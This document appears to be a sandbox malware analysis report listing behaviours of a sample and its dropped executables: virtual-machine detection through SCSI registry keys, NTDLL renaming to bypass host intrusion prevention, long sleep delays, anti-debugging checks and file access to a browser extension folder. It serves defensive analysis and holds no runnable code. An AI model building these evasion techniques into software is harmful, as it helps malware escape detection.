Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Checks if the current machine is a virtual machine (disk enumeration)

Show sources

Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\46D6.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\46D6.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\46D6.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\46D6.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\46D6.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\46D6.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\iwbavbe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\iwbavbe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\iwbavbe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\iwbavbe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\iwbavbe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\iwbavbe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Renames NTDLL to bypass HIPS

Show sources

Source: C:\Users\user\AppData\Local\Temp\20BD.exe	File opened: C:\Windows\SysWOW64\ntdll.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	File opened: C:\Windows\SysWOW64\ntdll.dll			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\31F4.exe TID: 2900	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5483.exe TID: 3684	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 492	Thread sleep time: -2767011611056431s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 603	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 363	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4777
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3766

Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3D90.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\39A7.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2CF4.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\20BD.exe

Code function: 20_2_6AB96B90 rdtsc

20_2_6AB96B90

Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\5483.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\5483.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\5483.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\5483.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\Temp\5483.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\5483.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\

Source: explorer.exe, 00000006.00000000.721694539.000000000FDAA000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.707083087.000000000A897000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.732920845.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.707083087.000000000A897000.00000004.00000001.sdmp	Binary or memory string: 000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&d
Source: explorer.exe, 00000006.00000000.733043896.000000000A716000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATAY
Source: explorer.exe, 00000006.00000000.716770307.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.732920845.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.714052805.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000006.00000000.733043896.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000006.00000000.733043896.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: 3C84.exe, 00000017.00000002.1072882664.000000000118D000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\F7E3DjYJpC.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\F7E3DjYJpC.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging:

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Show sources

Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iwbavbe	System information queried: CodeIntegrityInformation

Source: C:\Users\user\Desktop\F7E3DjYJpC.exe

0_2_00426900

Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB912BD mov esi, dword ptr fs:[00000030h]	20_2_6AB912BD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB912BD mov eax, dword ptr fs:[00000030h]	20_2_6AB912BD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB912BD mov eax, dword ptr fs:[00000030h]	20_2_6AB912BD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB652A5 mov eax, dword ptr fs:[00000030h]	20_2_6AB652A5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB652A5 mov eax, dword ptr fs:[00000030h]	20_2_6AB652A5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB652A5 mov eax, dword ptr fs:[00000030h]	20_2_6AB652A5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB652A5 mov eax, dword ptr fs:[00000030h]	20_2_6AB652A5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB652A5 mov eax, dword ptr fs:[00000030h]	20_2_6AB652A5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB61AA0 mov eax, dword ptr fs:[00000030h]	20_2_6AB61AA0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB95AA0 mov eax, dword ptr fs:[00000030h]	20_2_6AB95AA0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB95AA0 mov eax, dword ptr fs:[00000030h]	20_2_6AB95AA0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38ADD mov eax, dword ptr fs:[00000030h]	20_2_6AC38ADD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h]	20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h]	20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h]	20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h]	20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h]	20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h]	20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h]	20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h]	20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h]	20_2_6AC24AEF
